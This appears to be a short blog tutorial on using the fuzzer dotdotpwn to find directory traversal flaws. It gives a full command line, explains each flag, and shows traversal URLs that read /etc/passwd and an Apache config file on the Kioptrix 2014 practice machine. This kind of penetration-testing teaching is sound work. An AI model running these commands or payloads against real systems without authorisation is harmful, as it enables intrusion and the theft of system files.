Exploiting potential directory traversals with the fuzzing tool dotdotpwn.

So you have researched your web app and have found that it is possible that it is vulnerable to directory traversal attacks. Very often the path to the initial point of the directory traversal is given in the exploit guide. If it isn’t however you can potentially use the dotdotpwn script to find a potential directory traversal.

For example:

cd /usr/share/dotdotpwn
dotdotpwn -m http-url -u http://(IPorDomainName)/examples/index.php?Action=View\&Script=/TRAVERSAL -k "root:" -o unix

 

-m sets the module to be http-url

-u gives the URL to be tested. The word TRAVERSAL is used in the script for the start point of the testing.

-k searches for the word “root”

-o sets the operating system to unix, this information should be available from the NMap scan of the target.

Running this will dotdotpwn to fuzz through a number of options to find directories that can be traversed  to. For example:

http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../usr/local/etc/apache22/httpd.conf

http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../etc/passwd

Capture

The examples above can be found by attacking the Kioptrix 2014 vulnerable machine on vulnhub.

For further information on dotdotpwn:

https://github.com/wireghoul/dotdotpwn

or run the following command in the terminal for the help menu

perl dotdotpwn.pl -h

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s